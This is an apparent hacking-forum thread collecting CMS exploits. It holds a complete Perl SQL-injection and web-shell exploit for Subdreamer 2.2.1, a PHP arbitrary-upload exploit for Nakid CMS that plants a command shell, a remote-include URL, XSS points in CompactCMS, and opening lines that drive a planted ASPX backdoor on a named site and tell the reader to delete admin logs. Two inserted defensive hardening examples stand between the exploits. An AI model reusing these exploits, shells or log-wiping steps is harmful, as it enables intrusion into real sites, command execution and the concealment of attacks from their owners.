#Execute metasploit shell throught Web-Backdoor (cmdasp.aspx).
system('curl -k -L -b /tmp/cookies.txt -c /tmp/cookies.txt  -d __VIEWSTATE=%2FwEPDwULLTE2MjA0MDg4ODhkZKAYI%2BuShUtjaEQHez7lnHYtwecj -d txtArg="C:\Inetpub\EventSites\enterpriseitsecurity.gr\files\\'.$parameter.'" -d testing=excute -d __EVENTVALIDATION=%2FwEWAwLw6bCOCgKa%2B%2BKPCgKBwth5tWrCE%2BPx6jReXWdJAVRgAZWRoxo%3D  http://www.'.$site.'.gr/files/cmdasp.aspx');
}

print "# ******************************************************************************#\n";
print "# CAUTION 	CAUTION 	 CAUTION 	 CAUTION 	 CAUTION       *#\n";
print "# ******************************************************************************#\n";
print "# In Order to delete the logs go to  http://www.target.gr/files/cmdasp.aspx    *#\n";
print "# and execute the following command :                                          *#\n";
print "#									       *#\n";
print "# sqlcmd -S target_IP -U Database_User -P Database_Password -d Target_Database *#\n";
print "# -Q ''delete from cms_AdminLog where logRecDbTable='Your_Public_IP' '' -u     *#\n";
print "#									       *#\n";
print "# The Username and password for the Database can be found inside global.asa    *#\n";
print "# ******************************************************************************#\n";


# ***********#
# Quitting :D
# ***********#
sub quit
{
print "\e[1;31mExiting...Bye-Bye!\e[0m\n";
exit(1);
}
# ***************************************************************** #
Subdreamer CMS
Subdreamer 2.2.1 SQL Injection / Command Execution Exploit
Code:
#!/usr/bin/perl

## Subdreamer 2.2.1 command exec exploit
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
## supported targets:
##  ~ without forum integration
##  ~ with phpBB2 integration
##  ~ with ipb2 integration
##  ~ with vbulletin2 integration
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
## (c)oded by 1dt.w0lf - 19/09/2005
## RST/GHC
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

## work:
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
## r57subdreamer.pl -p http://subdreamer.com.ru/ -u 2 -t 1
## ------------------------------------------------------------------
## [~]   PATH : http://subdreamer.com.ru/
## [~]   USER : 2
## [~] TARGET : 1 - PhpBB2
## [1] STEP 1 : TRY GET USER PASSWORD
## [~] SEARCHING PASSWORD ... [ DONE ]
## -----------------------------------------------------------
##  USER_ID: 2
##     PASS: 26310e438a5a1fb8622738f1e5d34f8b
## -----------------------------------------------------------
## [2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE
## [+] DONE! THIS USER HAVE ACCESS!
## [3] STEP 3 : UPLOAD FILE
## [+] DONE! FILE "img.php" UPLOADED
## [+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)
## SUBDREAMER# id; uname -a; ls -la;
## ----------------------------------------------------------------
## uid=1003(apache) gid=1003(apache) groups=1003(apache)
## FreeBSD customer-3314.cit-network.net 5.3-RELEASE FreeBSD 5.3-RELEASE #0:
## Fri Nov  5 04:19:18 UTC 2004     root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
## total 24
## drwxrwxrwx   5 enshteyn  apache  512 Sep 19 23:04 .
## drwxr-x---  10 enshteyn  apache  512 Sep 17 21:03 ..
## drwxr-xr-x   2 enshteyn  apache  512 Sep 10 14:09 Image
## -rw-r--r--   1 apache    apache   48 Sep 19 23:04 img.php
## drwxrwxrwx   2 enshteyn  apache  512 Sep 10 14:09 logos
## drwxrwxrwx   2 enshteyn  apache  512 Sep 10 14:09 smilies
## ----------------------------------------------------------------
## SUBDREAMER# exit
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

## config
## ------
##
## images folder
$img_folder = 'images';
## or try
##$img_folder = 'images/logos';
##
## end config

use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Std;

getopts('u:p:h:t:');

$path = $opt_p;
$user = $opt_u;
$hash = $opt_h;
$target = $opt_t || 0;

$s_num = 1;
$|++;
$n = 0;

@targets = (
#['target name','column1 in database','column2 in database','cookie name 1','cookie name 2']
 ['Subdreamer without forum','userid','password','sduserid','sdpassword'],
 ['PhpBB2','user_id','user_password','phpbb2mysql_data',''],
 ['IPB2','id','member_login_key','member_id','pass_hash'],
 ['PhpBB2 cookie injection','','','phpbb2mysql_data',''],
 ['IPB2 cookie injection','id','','member_id','pass_hash'],
 ['Vbulletin cookie injection','userid','','bbuserid','bbpassword'],
);

if (!$path || !$user || $target<0 || $target>5) { &usage; }
&head();
if($path=~/[^\/]$/) { $path .= '/'; }
print "[~]   PATH : $path\r\n";
print "[~]   USER : $user\r\n";
print "[~] TARGET : $target - $targets[$target][0]\r\n";
if($target==1||$target==2||$target==0) {
print "[1] STEP 1 : TRY GET USER PASSWORD\r\n";
if(!$hash){
print "[~] SEARCHING PASSWORD ... [|]";

FIND: while(1)
{
if(&found(47,58)==0) { &found(96,103); } 
$char = $i;
if ($char=="0") 
 { 
 if(length($allchar) > 0){
 print qq{\b\b DONE ] 
-----------------------------------------------------------
 USER_ID: $user
    PASS: $allchar
-----------------------------------------------------------
};
 last FIND;
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit(); 
 }
else 
 {  
 $allchar .= chr($char); 
 }
$s_num++;
}
}
else
{
print "[~] SKIP. HASH EXISTS\r\n"; 
$allchar = $hash;
}
}

print "[2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE\r\n";
if(&check_admin_rights())
 {
 print "[+] DONE! THIS USER HAVE ACCESS!\r\n"; 
 }
else
 {
 print "[-] DAMN! THIS USER NOT ADMIN =(\r\n"; 
 exit();
 }

print "[3] STEP 3 : UPLOAD FILE\r\n";
if(&upload_file())
 {
 print "[+] DONE! FILE \"img.php\" UPLOADED\r\n"; 
 }
else
 { 
 print "[-] DAMN! UPLOAD ERROR =(\r\n"; 
 exit();
 }
print "[+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)\r\n"; 

while ()
 {
    print "SUBDREAMER# ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'exit');
        last;
     }
    &run($cmd);
 }
 
sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0];
 $username = "no_such_user' OR (".$targets[$target][1]."=".$user." AND (ascii(substring(".$targets[$target][2].",".$s_num.",1))".$ccheck.")) /*";
  
 $xpl = LWP::UserAgent->new() or die;
 $res = $xpl->post($path.'index.php',
 {
 "loginusername" => $username,
 "loginpassword" => "nap0Jlb_Haxep",
 "login"         => "login",
 "Submit now"    => "Login"
 }
 ); 
 @results = $res->content; 
 
 foreach $result(@results)
  {
  if ($result =~ /(Database error)|(Invalid SQL)/i)
   {
   print "\r\n[-] SQL SYNTAX ERROR! CHECK TARGET!\r\n"; 
   exit();
   }
  #print $result;
  # english pattern
  if ($result =~ /Wrong Password/) { return 1; }
  # russian pattern
  if ($result =~ /...... ......./) { return 1; }
  # russian pattern 2
  if ($result =~ /............ ....../) { return 1; }
  # russian pattern 3 ( KOI8-R tested on subdreamer.com.ru )
  if ($result =~ /...... ......./) { return 1; }
  }
 return 0;
 }
 
sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub check_admin_rights()
 {
 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new( );
 $xpl->cookie_jar( $cookie_jar );
 ($host = $path) =~ s!http://([^/]*).*!$1!;

if($target == 1)
  {
  # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???
  #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);
  # default phpbb2 cookie  
  $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
  }
 elsif($target == 3)
  {
  # phpbb2 cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);  
  }
 elsif($target == 4)
  {
  # ipb2 cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);  
  $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
  }
 elsif($target == 5)
  {
  # Vbulletin cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);  
  $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
  }
 else
  {
  # subdreamer || ipb2 cookies
  $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
  $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
  }
  
 $res = $xpl->get($path."admin/index.php");
 if($res->content =~ /loginpassword/) { return 0; }
 else { return 1; }
 }

sub upload_file()
 {
 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new( );
 $xpl->cookie_jar( $cookie_jar );
 ($host = $path) =~ s!http://([^/]*).*!$1!;
 
 if($target == 1)
  {
  # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???
  #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);
  # default phpbb2 cookie
  $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
  }
 elsif($target == 3)
  {
  # phpbb2 cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);  
  }
 elsif($target == 4)
  {
  # ipb2 cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);  
  $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
  }
 elsif($target == 5)
  {
  # Vbulletin cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);  
  $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
  }
 else
  {
  # subdreamer || ipb2 cookies
  $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
  $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
  }
  
 $res = $xpl->post($path.'admin/imagemanager.php',Content_Type => 'form-data',
 Content => [
 'action'        => 'uploadimage',
 'folderpath'    => "../$img_folder/",
 'MAX_FILE_SIZE' => '1000000',
 'image'   => [ 
               undef,
               'img.php', 
               Content_type => 'text/plain',
               Content => '<? if($_POST[cmd]) { passthru($_POST[cmd]); } ?>', 
              ],
 'submit'        => 'Upload Image',
 ],
 );
 if($res->content =~ /Settings Updated/) { return 1; }
 if($res->content =~ /Uploading Errors/) { return 0; }
 else { return 1; }
 }

sub run()
 {
 $xpl = LWP::UserAgent->new() or die;
 $res = $xpl->post($path.$img_folder.'/img.php',{'cmd'=>$cmd}); 
 print "----------------------------------------------------------------\r\n";
 print $res->content;
 print "----------------------------------------------------------------\r\n";
 }

sub usage()
 {
 &head();
 print q(|                                                                    |
| - Usage:                                                           |
| r57subdreamer.pl -p <path> -u <user_id> [-t <target>] [-h <hash>]  |
|     <path>    - Path to subdreamer folder                          |
|     <user_id> - User id for bruteforce                             |
|     <hash>    - MD5 password hash for this user if you have it =\)  |
| - Available targets:                                               |
|          - brute password:                                         |
|               0 - Subdreamer without forum integration ( default ) |
|               1 - Subdreamer with PhpBB2 integration               |
|               2 - Subdreamer with IPB2 integration                 |
|          - cookie sql injection, dont need brute password:         |
|               3 - Subdreamer with PhpBB2 integration 2             |
|               4 - Subdreamer with IPB2 integration 2               |
|               5 - Subdreamer with Vbulletin integration            |
+--------------------------------------------------------------------+
| e.g.:                                                              |
| r57subdreamer.pl -p http://127.0.0.1/subdreamer/ -u 1              |
| r57subdreamer.pl -p http://www.subdreamer.com.ru -u 2 -t 1         | 
+--------------------------------------------------------------------+
 );
 exit();
 }

sub head()
 {
 print q(
+--------------------------------------------------------------------+
| Subdreamer version 2.2.1 sql injection + command execution exploit |
|                          by 1dt.w0lf                               |
|                            RST/GHC                                 |
+--------------------------------------------------------------------+
);}
Nakid CMS
Nakid CMS 0.5.2 Remote Include Exploit
Code:
http://[victim]/modules/catalog/upload_photo.php?core[system_path]=[evil script]
Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit
Code:
<?php
/*
 -----------------------------------------------------------------
 Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit
 -----------------------------------------------------------------

 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0     _                   __           __       __                     1
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
 1                  \ \____/ >> Exploit database separated by exploit   0
 0                   \/___/          type (local, remote, DoS, etc.)    1
 1                                                                      1
 0  [+] Site            : Inj3ct0r.com                                  0
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
 0                                                                      0
 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

 Developers: www.nakid.org
 Download : https://sourceforge.net/projects/nakidcms/files/Nakid%20CMS%20v_0_5_2.rar/download
 Version:   0.5.2
 exploited by ..: eidelweiss
 
 details..: works with an Apache server with the mod_mime module installed (if specific)
  
 [-] vulnerable code in path/includes/js/fckeditor/editor/filemanager/connectors/php/config.php

 // SECURITY: You must explicitly enable this "connector". (Set it to "true").

 	$Config['Enabled'] = true ;

 // Path to user files relative to the document root.
 $Config['UserFilesPath'] = '/nakid_uploads/' ;
 //$Config['UserFilesPath'] = '/userfiles/' ;

 // Fill the following value it you prefer to specify the absolute path for the
 // user files directory. Usefull if you are using a virtual directory, symbolic
 // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
 // Attention: The above 'UserFilesPath' must point to the same directory.

 // What the user can do with this connector.
 $Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;

 $Config['AllowedExtensions']['File']	= array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
 $Config['DeniedExtensions']['File']     = array() ;

 $Config['AllowedExtensions']['Image']   = array('bmp','gif','jpeg','jpg','png') ;
 $Config['DeniedExtensions']['Image']    = array() ;

 $Config['AllowedExtensions']['Flash']   = array('swf','flv') ;
 $Config['DeniedExtensions']['Flash']    = array() ;

 $Config['AllowedExtensions']['Media']	= array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
 $Config['DeniedExtensions']['Media']    = array() ;

    With the default configuration of this script, an attacker might be able to upload arbitrary
    files containing malicious PHP code, because multiple file extensions aren't properly checked.
*/
 
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {
  print "\n[-] No response from {$host}:80 Trying again...";
  $sock = fsockopen($host, 80);
 }
 fputs($sock, $packet);
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 return $resp;
}
function upload()
{
 global $host, $path;
  
 $connector = "/includes/js/fckeditor/editor/filemanager/connectors/php/config.php";
 $file_ext  = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");
  
 foreach ($file_ext as $ext)
 {
  print "\n[-] Trying to upload with .{$ext} extension...";
   
  $data  = "--abcdef\r\n";
  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
  $data .= "Content-Type: application/octet-stream\r\n\r\n";
  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
  $data .= "--abcdef--\r\n";
   
  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Content-Length: ".strlen($data)."\r\n";
  $packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
  $packet .= "Connection: close\r\n\r\n";
  $packet .= $data;
   
  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
   
  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
   
  $packet  = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Connection: close\r\n\r\n";
  $html    = http_send($host, $packet);
   
  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
   
  sleep(1);
 }
  
 return false;
}
print "\n+--------------------------------------------------------------------------+";
print "\n| Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+--------------------------------------------------------------------------+\n";
if ($argc < 3)
{
 print "\nUsage......: php $argv[0] host path\n";
 print "\nExample....: php $argv[0] localhost /";
 print "\nExample....: php $argv[0] localhost /Nakid/\n";
 die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed You are not lucky...\n");
else print "\n[-] Shell uploaded in progress...!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
 print "\Nakid-shell# ";
 $cmd = trim(fgets(STDIN));
 if ($cmd != "exit")
 {
  $packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
  $packet.= "Host: {$host}\r\n";
  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
  $packet.= "Connection: close\r\n\r\n";
  $html   = http_send($host, $packet);
  if (!eregi("_code_", $html)) die("\n[-] Exploit failed You are not lucky...\n");
  $shell = explode("_code_", $html);
  print "\n{$shell[1]}";
 }
 else break;
}
?>
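As an added defender-side example (not code from this post, from Nakid CMS or from FCKeditor): the upload check the advisory above describes compares only the final extension with the allow-list, so a name such as `0k.php.jpg` passes and, on an Apache server with mod_mime, may still be handed to the PHP handler. The hardened check below inspects every dot-separated segment of the name and never stores the file under the user-supplied name. Function names, the executable-segment list and the sample names are my own assumptions, not anything from the project.

```php
<?php
// Added example: hardened upload-name validation for the double-extension
// case ("0k.php.jpg") described in the advisory above. Not Nakid CMS or
// FCKeditor code; function names and the extension lists are assumptions.
declare(strict_types=1);

// Segments that a typical Apache/mod_mime or CGI setup may map to a handler
// even when they are not the final extension. Assumed list: extend as needed.
const EXECUTABLE_SEGMENTS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'phar', 'phps',
    'cgi', 'pl', 'py', 'sh', 'asp', 'aspx', 'jsp', 'htaccess',
];

// The kind of check the advisory describes: only the last extension is compared
// with the allow-list, so "0k.php.jpg" is accepted.
function weak_check(string $name, array $allowed): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true);
}

// Hardened check: every dot-separated segment must be harmless and the final
// extension must be on the (lower-case) allow-list.
function is_safe_upload_name(string $name, array $allowed): bool
{
    // Path separators and control characters (including NUL) are never valid.
    if (preg_match('/[\/\\\\\x00-\x1f]/', $name) === 1) {
        return false;
    }
    $segments = explode('.', strtolower($name));
    // Need a base name plus at least one extension; this also rejects ".htaccess".
    if (count($segments) < 2 || $segments[0] === '') {
        return false;
    }
    $ext = array_pop($segments);
    if (!in_array($ext, $allowed, true)) {
        return false;
    }
    // Inner segments ("php" in "0k.php.jpg") must be neither empty nor executable.
    foreach (array_slice($segments, 1) as $segment) {
        if ($segment === '' || in_array($segment, EXECUTABLE_SEGMENTS, true)) {
            return false;
        }
    }
    return true;
}

// Never store under the user-supplied name: keep only the validated extension
// and generate the base name server-side.
function stored_name(string $validatedName): string
{
    $ext = strtolower(pathinfo($validatedName, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names and an FCKeditor-style allow-list (assumed values).
$allowed = ['jpg', 'jpeg', 'png', 'gif', 'zip', 'gz', 'doc'];
$samples = ['photo.jpg', '0k.php.jpg', 'notes.PHP.JPG', 'archive.tar.gz',
            'a.phtml.zip', 'shell.php', 'report.doc', '.htaccess'];

foreach ($samples as $sample) {
    printf("%-16s weak=%-6s strict=%s\n", $sample,
        weak_check($sample, $allowed) ? 'accept' : 'reject',
        is_safe_upload_name($sample, $allowed) ? 'accept' : 'reject');
}

if (is_safe_upload_name('photo.jpg', $allowed)) {
    echo "stored as: ", stored_name('photo.jpg'), "\n";
}
```

Run it with `php upload_check.php` (any file name) to compare the two checks side by side on the sample names. The name check is only one layer: the upload directory should additionally be served with script execution disabled (no PHP handler, no `.htaccess` overrides), so that a file which slips past the name filter is still delivered as static content.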
Old 26.01.2011, 11:22   #2
Cordinal
RAM 16MB
Registered: 03.01.2010
Posts: 25

Re: Vulnerabilities of various CMS

CompactCMS 1.4.1 Multiple Vulnerabilities
PHP code:
# Exploit Title: CompactCMS 1.4.1 Multiple Vulnerabilities
# Google Dork:   intext:"Maintained with CompactCMS.nl" intitle:"Print: *"
# Date:          17-12-2010
# Author:        NLSecurity
# Software Link: http://files.compactcms.nl/stable/
# Version:       CompactCMS 1.4.1
# Credits:       http://www.nlsecurity.org/
# Extra:         irc.6667.eu  #main
 
Description:
 
CompactCMS 1.4.1 has multiple XSS and File Disclosure vulnerabilities. These file disclosures will
appear if the users have access to view open directories.
 
--- File Disclosures ---
 
/admin/includes/modules/backup-restore/
/admin/includes/modules/backup-restore/content-owners/
/admin/includes/modules/backup-restore/module-management/
/admin/includes/modules/backup-restore/permissions/
/admin/includes/modules/backup-restore/template-editor/
/admin/includes/modules/backup-restore/user-management/
 
/admin/includes/fancyupload/
/admin/includes/fancyupload/Assets/
/admin/includes/fancyupload/Assets/Icons/
 
/admin/includes/fancyupload/Backend/
/admin/includes/fancyupload/Backend/Assets/
/admin/includes/fancyupload/Backend/Assets/getid3/
 
/admin/includes/fancyupload/Language/
/admin/includes/fancyupload/Source/
/admin/includes/fancyupload/Source/Uploader/
 
/admin/includes/edit_area/
/admin/includes/edit_area/images/
/admin/includes/edit_area/langs/
/admin/includes/edit_area/reg_syntax/
 
/admin/img/mochaui/
/admin/img/styles/
/admin/img/uploader/
 
/_docs/
 
... Perhaps more, but this should give an idea. :-)
 
--- Cross-Site Scripting Vulnerabilities (XSS) ---
 
/afdrukken.php?page=">[XSS]
 
This can be found on line 48:
<strong><a href="<?php echo $ccms['rootdir'];?><?php echo ($_GET['page']!=$cfg['homepage'])?$_GET['page'].'.html':null?>"><?php echo $ccms['lang']['system']['tooriginal']; ?></a></strong>
Vuln: $_GET['page']
 
---
 
/admin/includes/modules/permissions/permissions.Manage.php?status=notice&msg=[XSS]
 
This can be found on line 62:
<?php if(isset($_GET['msg'])) { echo '<span class="ss_sprite ss_confirm">'.$_GET['msg'].'</span>'; } ?>
Vuln: $_GET['msg']
 
---
 
/lib/includes/auth.inc.php
Username input field (userName) has an XSS vulnerability when using POST data.
 
This can be found on line 119:
<label for="userName"><?php echo $ccms['lang']['login']['username']; ?></label><input type="text" class="alt title" autofocus placeholder="username" name="userName" style="width:300px;" value="<?php echo (!empty($_POST['userName'])?$_POST['userName']:null);?>" id="userName" />
Vuln: $_POST['userName']
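As an added defender-side example (not CompactCMS code and not part of the post above): the three sinks the advisory names all echo a request parameter straight into HTML, once inside an `href` attribute, once as element content and once as an input `value`. The block below puts the vulnerable `afdrukken.php` shape beside a hardened one and shows the same output encoding applied to `msg` and `userName`. Function names and the page-slug pattern are my own assumptions; the payloads are constructed in the `">[XSS]` shape the advisory uses.

```php
<?php
// Added example: output encoding for the three CompactCMS sinks named in the
// advisory ($_GET['page'], $_GET['msg'], $_POST['userName']). Not CompactCMS
// code; function names and the page-slug pattern are assumptions.
declare(strict_types=1);

// One encoder for element content and double-quoted attribute values.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable shape (afdrukken.php, line 48 in the advisory): $page lands inside
// href="..." unencoded, so a value starting with "> closes the attribute and tag.
function print_link_vulnerable(string $rootdir, string $page, string $homepage): string
{
    return '<a href="' . $rootdir . ($page != $homepage ? $page . '.html' : '') . '">original</a>';
}

// Hardened: constrain the slug (assumed pattern) and encode the finished href.
function print_link_hardened(string $rootdir, string $page, string $homepage): string
{
    if (preg_match('/^[A-Za-z0-9_-]{1,64}$/', $page) !== 1) {
        $page = $homepage; // unknown slug: link to the home page instead
    }
    $href = $rootdir . ($page !== $homepage ? $page . '.html' : '');
    return '<a href="' . e($href) . '">original</a>';
}

// permissions.Manage.php, line 62: encode $_GET['msg'] before echoing it.
function notice_hardened(?string $msg): string
{
    return $msg === null ? '' : '<span class="ss_sprite ss_confirm">' . e($msg) . '</span>';
}

// auth.inc.php, line 119: encode the reflected $_POST['userName'] value.
function username_field_hardened(?string $userName): string
{
    return '<input type="text" name="userName" id="userName" value="'
        . e($userName ?? '') . '" />';
}

// Constructed payloads in the shape the advisory uses ("> followed by markup).
$page = '"><script>alert(1)</script>';
$msg  = '<img src=x onerror=alert(1)>';

echo print_link_vulnerable('/', $page, 'home'), "\n"; // attribute broken out of
echo print_link_hardened('/', $page, 'home'), "\n";   // falls back to the home page
echo notice_hardened($msg), "\n";                     // markup shown as text
echo username_field_hardened($page), "\n";            // stays inside value="..."
```

Encoding at the output point is the fix that closes all three findings at once; the slug check on `page` is an extra layer because that value is also used to build a URL, and a URL built from an unconstrained parameter invites other problems than XSS.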
Old 11.04.2011, 02:03   #3
denwers
RAM 32MB
Registered: 11.03.2011
Posts: 47

Re: Vulnerabilities of various CMS

What does "vulnerability" mean? What does it give you?
Old 11.04.2011, 02:41   #4
mironich
RAM 256MB
Registered: 22.11.2010
Posts: 2,026

Re: Vulnerabilities of various CMS

Quote:
Originally posted by denwers
What does "vulnerability" mean? What does it give you?
A lot of things: privilege escalation, and so on, MySQL injection.
In this one, path disclosure and something else.
Old 17.04.2011, 00:27   #5
denwers
RAM 32MB
Registered: 11.03.2011
Posts: 47

Re: Vulnerabilities of various CMS

All fine, I'd just like to know how to use it as well; so that's not for me. How are these vulnerabilities found?
Old 17.04.2011, 09:29   #6
Fooog
«¤†‡°°‡†¤
Registered: 27.01.2011
Posts: 574

Re: Vulnerabilities of various CMS

Quote:
How are these vulnerabilities found?
Install the engine you want to find a vulnerability in and start looking for bugs in it.
And in general, start by reading about what exploits are, SQL injection, and at the very least what XSS is.
Old 18.04.2011, 21:11   #7
denwers
RAM 32MB
Registered: 11.03.2011
Posts: 47

Re: Vulnerabilities of various CMS

Well, I roughly got it. I checked my own site and found vulnerabilities with xpider 7.7: a buffer overflow and an SQL injection. How do I fix them?

Added after 4 minutes 31 seconds:
I looked around on the net, there are even examples of how to break in, grant rights..., but where do I enter all that text so that these changes take effect if I visit my site as a guest?
